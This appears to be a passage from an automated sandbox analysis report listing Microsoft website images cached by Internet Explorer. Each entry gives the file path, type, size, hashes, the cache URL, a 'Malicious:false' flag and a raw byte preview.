                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.......1.....orNT..w....%IDATX..M..@..?.9.b D.2.E.Kx...Y...a6...q.\AP...q1.,..g&...w..7.UU...T*.w..xs...Y..k......Z9...a....S..[.......;......T.........5.........n..c.l...G..i...~Y....%..^.CH..V.K...tJ%Mb.....S...s.i.!..S..../..... ..t_L.#$..1..|....q.@.................|Nd.Y..2..q.oa..u.-.3..0-..^...T.\_I.',..fw....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4IeM6[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 35 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                              Entropy (8bit):7.783448805488839
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JY4X2OL5xgDKEDDArbLnKU3Pk6V/08ndvTCW30sp37ZVL7CNq2+xb2eSMmOf:J3XnPYKKAJPk+hJpZrZVD24ilM5f
                                                                                                                                                                                                              MD5:3AF3F73060CAC1F5BBD623587EE37199
                                                                                                                                                                                                              SHA1:EBD79F8E3B73E511FD4829870D620EF46023B502
                                                                                                                                                                                                              SHA-256:3FDAD4D77F22D8A255F17AA3042D8E4BF77E632D393EC1654747FCB305DE9E35
                                                                                                                                                                                                              SHA-512:665182546920E9126FA1BE893269FB806C38436DC624DE12ED51BC6B6DAC9DDA28B1A546E735DBC7879816E01F6EB80AEDF8CD7C8EE6279CE19F6328E3315ECD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IeM6?ver=b4e0&q=90&m=6&h=35&w=35&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...#...#.......Y....orNT..w.....IDATX.._.]G..?.3..Sb.d........U...@J......S)5...D+..>.P.....V,".(.A.....'Q+E\CAMR.H$f7...33.....f.....d.r..pf>....;c.}ohhm.6Q..;.......es....;....].|0fg.^?.....V....).4........g..:J;..;.t_...I.......<..&'"n#.vX.0p.....O.`^\......F.h..%.9.E.3...!..7.....U7...o.m_1...~&..f..m.....HD.A .o..;..,^._...64..7...~I.~._./.7.8.r...z.....*`..M....f8...f.2|. .k.Lo.#v.{f......|w#}....p..J..(.W.QR...3.._u.-...`._\....W...."^.P*..7....Y.gE..h0..g^..........V'.u0.w..2o0O.eJ..n-..zvt....u.....gO.|k...'U.e...s._.P....G.O.9...j..%.W........N\...a.....O(....3Aj3b....r...p!S..j>..CM.Y....e.Nj.Z?.z..7....FE.....k.#.....sW..L.....*2......<a.)...Lo....W.B["B.B.<S..g..0%...BB....G....'...L..F!.:=..B....3.t..`+!8&.".P...l.f..`...p(........+3.l..!dP.T.(.4;...cUkE.}..5....;.S.L%.cS0.B...0..m..63(OMu...43U.^...r......S\......l..].B...c/...f:..,.l(..x..n..;...5.&-.{..8..T=j!......~....<ueq2j.0............S...#
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4Ihuk[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2620
                                                                                                                                                                                                              Entropy (8bit):7.897989732462998
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nXdlDtkyD/BmHgol5PCFcupYwigpTys1dDNomNb7l:nXdfky9nol5PCFcA9hjnHl
                                                                                                                                                                                                              MD5:7718C637D74C7DD41FB665373A6B6796
                                                                                                                                                                                                              SHA1:52D63BAFED4790B74537F56B2493186F01EB765D
                                                                                                                                                                                                              SHA-256:312F673FD70BAE0DFBA8AA250070C43F256CCB554A6D139F070345D7976EAB73
                                                                                                                                                                                                              SHA-512:89A521F33DB2B3EB3D9210D400A60778A91182ACD7F19C89EBAB85E6E0B46EAA97CFFFE7BD256BFB9F58E57428F3441198FF934AB0DA33806ACDC5387D09FF98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Ihuk?ver=c72a&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w.....IDATh..i......U.=3;{.w.]....`..c...,l..1.|@._.8..&!.#..D."..C....(..."1..@X` 1...9l.9.G.w......*..ww.....!.T.........z..^.^..u........|Sb./....v.z.b;.!.,.|.J..Q(..7..\n#..}..8...-...........P..s.....=P.(.......X..5.$...8.@3...r....G>.>Rlf....y.......0.1...=...B+....7@<....pX.=U....1.%...._.....G,.,._7.u..7........S....q.y..?.5.GO...=.Pz-.....FC......m.G3eBF<+...).X.U.k.:..[[.4}3.w6..j=.R..I.]..bDQ,...@.............S~...B.l...I.`;.+.f.........?.......B:.....'n.G.w0a....<7....`Y.\GT..b\?(.OZ....'`..._u......ub...).aT...5x.|M.6.....g...........m...e=..+.e....mm... Q..a..:..aI...-..k$qK..Ae.<............J...<..mn..~..ux..71.....;.u.i3.M.L.....Z.?5N...O.......bo..1sEx/.sC....I!.\.....CSs..6.0.N.qA.7...(<@.-...Z.&D@+.A).R......j)$..@.x.b..p....xln=...T..f....oHXpV...f.x.2..z$...&z._.c..X..u\....ZCK.s..u|..b\..+z.j..e.)....9.`N....S........".f...h.......... ...#..C<.,.".f8..N./.|F..yw...G..........
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4It5U[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 35 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):581
                                                                                                                                                                                                              Entropy (8bit):7.512627471856839
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7sYYmftWGvalCgLoDH3dluha4yCuX5hCr8x+EhHvKHmeUfaMXmJnwv6DcfFqz:JYDfTvaUbka4yGr8x+EhPDepuQcfFg
                                                                                                                                                                                                              MD5:5D54E66906F0146C9B8E31C632C8F983
                                                                                                                                                                                                              SHA1:73D633C4B329412D521495D9634552DB9B6E0DF6
                                                                                                                                                                                                              SHA-256:99CB22C1E6F07D5D910864E27ED56E14EDAE106836BBD439247CB8E52E29CB61
                                                                                                                                                                                                              SHA-512:C6C62D889C3D6FC28B18F4F32F2AEC0F1E49C6446E3E7C011A02D972F05BA033A62FAE7FA4A13F509817C7D87DAE4FB1DCCAA1641AFBE7A8A831AA43E7A54427
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4It5U?ver=e97a&q=90&m=6&h=35&w=35&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...#...#.......Y....pHYs..........+......IDATx..=K.A..MH.......B... Z+XZ....bci...V...`%..?.B..J.U,..6..G..^.....x.{3.|.ln.R..H.b\..w....~.YPv.Z.O...c....&..|.t....x...K".@......T.....V.-......]`........8.i....ynk...Y8.^.|..M.#.{.=....,z..q'. r.].g..M.....5...m...q.=.._w.........m..4Y%.....O.c.d./.J..sM....[....JL1.x........)..bL.9._..j1y.:8..`..o|.V.k#.' i....1.........#.........9. ~.].M.......f..:.....3Q:.."...(...h.V.]...c..a..Lx`.Y.Q.Q...o...+.$Hc.c5s.mETd.P...Q.k0..`.BE..`..;../..^j~U...U..8..R.1....eE....qg\.....`j..b....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4It5V[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 35 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1225
                                                                                                                                                                                                              Entropy (8bit):7.815452295914176
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JYXTf8HqtxivEVpDJLxjdDJhpTcOSujxvGSdTka2Dl+Odgjvq6ug9:Joz8G6EV1FJbcOSujUi2B+kgjZr
                                                                                                                                                                                                              MD5:457989A656C6DC03CD33F159C2F45BFF
                                                                                                                                                                                                              SHA1:3936E7F6C0FE4F560442727F6884FE7812B602AE
                                                                                                                                                                                                              SHA-256:3BB2EA9816AD53639E33BD37AEDF41A431D147A5287BAAD8220E243E5CDC81E7
                                                                                                                                                                                                              SHA-512:C9B9D6089FB017A9E6D5DD8D5AB2A8600C7A7D725523ACD64CD2E3CC68F485945FED9E2C38AC36969302C759938B63CBE8E9366FE4F1644D42893A369C7F6223
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4It5V?ver=4a9d&q=90&m=6&h=35&w=35&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...#...#.......Y....orNT..w.....IDATX..}P.u..9.d..6F.. Iq.B..1! ........y.u..!.q...l.">..*.........!........C..;....7....O..........y..|.^^....+.......$...k`..D..(....r...T$.H.A........:.].K.D$.zh^...O....6.%."...G....v..h.1$|v...o.4..}!.....V.[$..ee.5X(...Z..AK_9C....e.[D.zl"...}..n+...F....H.z..\..nL.B1U.V.........n..*~.>Q.n. .............@.0..tQp.yT..2m$M..'J9N~.."..H8.s@:...0.-OD...XK...dY........."...*...q.......m".Nzr...?..I..I..q2.._..+2...;>Hr-J.3*...x.*...I....^......1....Q..dT&...0M.....M>.>i..O..rVd.....3._...>.k;(.U..'.Q....1.`..4.pVd>8...e.....Jt>,....d?7..."-..2#.;.7.b+Eh....;2.6D..=...._z.W..Y.T9.y....p..........^n.D....'r.........'.q.d.:.d...s..:6`.....a...AO.:..|f:1....c.....[c,M;J....'_OG.!.Y.H./.<kJz...I.m..Ej...w....>h.6...M..Ey......}?....30...1.....p.V.....!.%..1.m...ZK.wt...M$.z..I.C....."...=neu.O.1..2.=.)..M..~k...\.'...Y..9/P.]..J/b..r.......;.mm.<.z....w.?...1....q.I,.3..L..1.cN+.(..[...v.T".
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4IyjB[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):292
                                                                                                                                                                                                              Entropy (8bit):6.910462075244998
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPmLtkNmltg5w5xv/oHASbCXcqv8k8pKYFljp:6v/7OLlt9Lvo5CXl8YON
                                                                                                                                                                                                              MD5:A96B1772C921E83703351BBEF73456E9
                                                                                                                                                                                                              SHA1:2F1E14B9702527C9CE71959A9A3485B0FE8E57D5
                                                                                                                                                                                                              SHA-256:A57C97BD66CAF6A7F421EA410ED6C8AF506D2C25C76E9CAF81CCA4D7582ED5AF
                                                                                                                                                                                                              SHA-512:464A9074B2A52A05570EC61A360A9C0751860D215F0EAA648CCA6A3D215645BBB297B8DF3B21E9358A2A0E9E16149D2FB6F69042200945AC000BF0F0C35C322E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IyjB?ver=382f&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.......1.....orNT..w.....IDATX...=JCA.../ ....A..TDp16..........X...4.@...---.!b... .2S..9...;...H.4-[.......^.....8..#y.v...'.$.&.ch....%...n...l......Q....@...0.@.J...v......<.+....y*.4Tj....}.]..J..]3.2v..o.a....W..$...aV..t...g...........3.].....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4o6Z8[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):20931
                                                                                                                                                                                                              Entropy (8bit):7.9402700874994885
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:D52kll0DQA6r6auLWYGBq0k0tUFrWoovD1ueBuz9h8evhtr+OusaU7/8:D5n0Dn6rWas0k0Od7apBuzL8e3tamk
                                                                                                                                                                                                              MD5:85C5A6DC73DFBD62E176A7FF4C4965F5
                                                                                                                                                                                                              SHA1:D24B45CCF209B92430DFD7DCA88C663B3CB4DED6
                                                                                                                                                                                                              SHA-256:335BBE0C9E6ECDA849665169591BABB9E1FE39BC6426F893C58A14E27CD0445E
                                                                                                                                                                                                              SHA-512:5B476604F667F8184430C6E9EDB38E04F8C47839F385112253A667604F0606A428DC0800F1AAA2BDDE913B9BE1A46770E77067C27ED9E9F052D80AE729523A23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4o6Z8?ver=bc5a&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.................................................................! !,,;...........................................................! !,,;...........".....................................................................................................N.....1..^+...c1x.^/...b.X.n7..Q......8.'.....e..*'...S...M0;..S.....'.}.I....'.j..Ft..z.w.......\3.{.w......Z{.......................I.F.P.......vs...y...W... Fp.........^`..h'...FpO.#8.x.R.g.A...u'.&.=|#8'....3...l^.=.......7.]0M0Fh.<@#;.:....{.......s..!4...O....Gn..<....h.....y'.....x.t..;.w.....q......Q4...Fp.AxWj.#...jkL.QYIiBId..............jy.....3...$.I-9i......g...G..w...5......e$..HJ.N.%K,...d`...S..f....S=....d....IeS... .......]....._7.T..%..d....K....A.....`.....no.ta.F..a ..,....w..i^....>]>.=%Rh.........a.-).Z...[...6.=......;.1susT.p....a08<&.....!uwyq^.yt..w].^\...k.:.9...+..U.3a.....g..q.....3....r.{7f...=C..n....s._H.%.K,..........#...t.3..-9=..=.Na..G...En........?..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4pkvE[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):234
                                                                                                                                                                                                              Entropy (8bit):6.336886292770393
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPnMtkiQg5gmlUkBNdMSwul9Kx+2lPpgt+SgU2KmiZUup:6v/7PVg5gSUkBDkSox+2VPSgU0iqc
                                                                                                                                                                                                              MD5:260A51F19FFB5DC5B69223FA27B28B7F
                                                                                                                                                                                                              SHA1:45DB7B29D637618990DDBE2C428875EB2B9E4B97
                                                                                                                                                                                                              SHA-256:38D313123BA702A51B25E52DF6C17F5CDF127C1BA2094F05F968AD2890CEB49F
                                                                                                                                                                                                              SHA-512:C0809F0BBEB79665DE95C7C7455E9FDFC878D6553B377F7B4F742034BC35624BA07CCD320B6557509BF3EE772CCEFFFE1017B498247DFF54563AFAD288B789C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pkvE?ver=d8fc&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w.....IDATH.c`.t@...!...a=.~......4..h.~..@#P!...hD..#.4.bD?.3 ...1X.t`...1...=.....D7...a ~.....8j.P1../T..f.AZ...p4..8j..0..#.....jK...b6tA..j..Yjbk=R` ...~...1.w....N.aG.@.z....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4pndL[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):916
                                                                                                                                                                                                              Entropy (8bit):7.699275648627113
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:adCm1Rg/V4O59R2h6U2WRTR6DBix7QaOsG59Mni99H1:aRolz2hbR8BC7Q0G592i9d1
                                                                                                                                                                                                              MD5:3A78BC00E75A109AFC5AFA9D38FB6A7D
                                                                                                                                                                                                              SHA1:6D0CA05953B517487819172D32128DF704F85ECA
                                                                                                                                                                                                              SHA-256:F6C718F4E6D8C3385821ABA8B5DE1468F48B88650741B3152A9921C34ABC1CA6
                                                                                                                                                                                                              SHA-512:4E8053D72719C55ADC7D9457D293C7E913BF62629038B3DD86550D07FF4412D5C3CA6DACAA90D971AC56C5B8894F9A0DBD4EE472443D18AAF90BCC1D2815E703
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pndL?ver=5217&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(........m....pHYs..........+.....FIDATx...Mq..].tr.a\..^i$......A....4....4...'..G.<(e.&M.DR..r....g....f.N.......y...~k...k............e..:...q..f0.`...=>....?.@.....*..c..Z.V....j...'.....b............%w.).M>..w..A..G....k/...6.S.H.@...s.....=Pb...Kw../. ..Y..~).!H.>p.C..T`.4........._...'..........t..[4...U`.......I.....cA....\H.....Lx.@.*...(...'.6.......?......qy..LQ<.n..O.....z..N.(GZ...(.r.8............(..@]^.]Q...<?...+A.....;...`P.{..z.4r......3...z%8.:...;..f..luym.Wc..._....8G...St#.@..0.x...$...*.^....n.....*.:.+8M. ...H.^..i......(u.Y...^}W.......`..+.:...x.....s"..F.........T...5.o......g..l.m*..:..;k..AV.?KL.....V.*p&.gs.u....|]..V...zl....1......T`#....Z....X.QT.........rB..$&(v....gT...r$.."....g...>...u.E.....5$....../........D..g..g>X..1....:X!..YT..a.s...T...NL.%.~.oW!K..:.v."?...8..P.@9.TH4.1.^W.ET....L...n.......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4qZpg[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 380x214, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):34081
                                                                                                                                                                                                              Entropy (8bit):7.9719359056770704
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:hHsYVJpe4wkJBSGnPCPGKljxuAPEsffTirRBlOEAuy82T9yi:hFXV7b9PC5XdiBHOv
                                                                                                                                                                                                              MD5:C4DFFB7B7CA413516521EBAD3488EE60
                                                                                                                                                                                                              SHA1:B051AACA2404E4FA696BD6FC71D7680266233CDE
                                                                                                                                                                                                              SHA-256:EDFD84419F64B65A9774061B8B0CA7C55644BE7C5E96E4F724BDE814480682CF
                                                                                                                                                                                                              SHA-512:34C31913714932979EBDFA1937DBB9B15AF01DD9208559B4BC4404619D6EFB505B9F365DF59212339A672319021810E75993FD37185BBEF62E3A6997C622AFBD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qZpg?ver=06c1&q=90&m=6&h=214&w=380&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....`.`................................................................................................................................................|...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....A.q...d6.;6{Q$..w:]3k...7 ..bS.h%.>;'.....ilcQ....)...*p.....i..8c.9.h.%*.`.S,..K....4.4.b2@...~..8..a.T.....Q.G....G..5..K...F1..%.....$.......N...qo1.......c...A.sZE.M..i.;..........:...p.[...YTf.W..w......+....+.^..P...=...FV=O.^.(cA....I..'5..~.x.4.X.....1.z.^..J..<,Enwn...>:{.E4.:.....3y.r.>Z.`{..Iu87e..Cm...Q{y&.....cy.c.P:..9.W.............p...g..~..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4r1Ep[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 380x214, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35553
                                                                                                                                                                                                              Entropy (8bit):7.98558977254271
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dUP4J/IUWMhcgBM8ty/PzUFHe8IDW8aA1BOrVb9rRe3Jiv:d1NX06M8k7UFRIDWwB2Vb9ruiv
                                                                                                                                                                                                              MD5:441683FA04DA6088001428675AB77D04
                                                                                                                                                                                                              SHA1:56C578B7330985B0894DB7901AABE7CDD8B01B75
                                                                                                                                                                                                              SHA-256:70188207A983AE03CD0C9B96AE4B13301624DAC4F6AF26D05BEA6F9535731A41
                                                                                                                                                                                                              SHA-512:99AE82EC74ECD7B670263A5FA0C45A29D35A51B8CE640CA5112C6638E5B984694834F511ACCFAEF2775F1A985B4FBA500D45F4A356A3876AAB6BC72D899178AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4r1Ep?ver=4ccc&q=90&m=6&h=214&w=380&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%....................................................................%%2..............................................................%%2........|.."...................................................n.t.*.......>m8.NDO..ta|%.s...(<....P#C".-Y..-..i....x.f.U..l1.%B...4..a......+fW.....m..&....G...(.....196..m.s!....\^.;F..M.Bzx.G... ....A...J.....k.8[+.X.@.g..\..Ue.f.g.+..:.[...K....r.z...o...'|.........Mo+C.z9..C..nK.k..G.Q.0...oV....PV..u..i....\t.P....p........Lt_.NVy..\..k.:....fD[....^..b.m.....Q....a.......~.5.0./..t6.j.-......1.kZ_.1.....[..%.gR0P....sYd.td....f+v.X...B...A..V.UR3.......N..a5.Q...F.q...=.U.$W....=k..?..&/-%..l..)u...Q....BU..1.K.u.+.q..^~.....c1]1m.eI..[>......[......^a......_#..>.-..._.EH.E][.HiD.WH9..3.Y.......V'!ht..vl...{..{.H"..>.,.E..."b]..Gk&.m.....I.H.....n..i.Z.3........X....E.lJ.O....v...i/.h..7..0....<-..S...#.'.....$w.`sg...$O..Y.V....A...]w.*...7-..+...&b.n..........>.....y...j*
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4sQDc[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 2-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                              Entropy (8bit):5.408749734610453
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:yionv//thPlVXnblpNgpBhXiigy/bVEeo+kMlFoHdaRr3dO07I6F7CXjp:6v/lhPDCdyigCJekwdUtO07IOCTp
                                                                                                                                                                                                              MD5:4F7A9951BE528BA8E2C3AA2472481B15
                                                                                                                                                                                                              SHA1:8B9275A999A06FCE380DEAE84E828DBF8B650AA6
                                                                                                                                                                                                              SHA-256:8A51FC9883BAE76C510D2F4480C9911C4B03A3ED451DFF1064E6E7CF9694FB90
                                                                                                                                                                                                              SHA-512:E41C2F53F70AAB9CAA095897E1CE4C95AE7A03BD77D32F60B73F5E32F0B69F58EDE99305C12C01257500F2C23BEBBAB518CBC0419068C1039F529698CEA980D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQDc?ver=30c2&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(......P.....PLTE.............-\.....tRNS...9.......orNT..w....)IDAT..c`.......E.H|..L.....U ...?..........0G.......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RW4ESm[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 410 x 124, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):10281
                                                                                                                                                                                                              Entropy (8bit):7.932553860871155
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:jHTB9WWM+MIvWeayYlep2D/DKLZaaijjqpYq83IsObArjzYj6m4umo:T99PM+MDlb/+ijGSwsyArHYj63o
                                                                                                                                                                                                              MD5:A38EEF82A8CBC24F96E0B27A66506AB8
                                                                                                                                                                                                              SHA1:42D5D535BF79C72665DA7A718F94C0ACC5243057
                                                                                                                                                                                                              SHA-256:F180A19256E70DE4EC56E6A48649B15A33F993108DB64B1C678E8F409611D21C
                                                                                                                                                                                                              SHA-512:58DFBB559CFA2456351C11E0E2B80BAD9AB295ABF189F0045035AF3A801FD0E41E1864AA1FD7B6D4EB77F903D43AE36DF5C432D737A05F9DA2EDF4F5A8A72B9C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RW4ESm?ver=c63e&_=7
                                                                                                                                                                                                              Preview: .PNG........IHDR.......|.....PlvH....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:4A802EC7FEBC11E985CDD82FAA901635" xmpMM:InstanceID="xmp.iid:4A802EC6FEBC11E985CDD82FAA901635" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E13B3558868F11E684F1C14CADB5A579" stRef:documentID="xmp.did:E13B3559868F11E684F1C14CADB5A579"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.r....$.IDATx..]..U.....{.!SE.G2d....)SH.....S..S.9.P..*...R.x..3ez.g,C....Y....g..9.....r.;.>...k..]uK.,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RWBtR2[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4874
                                                                                                                                                                                                              Entropy (8bit):5.192043692477875
                                                                                                                                                                                                              Encrypted:false
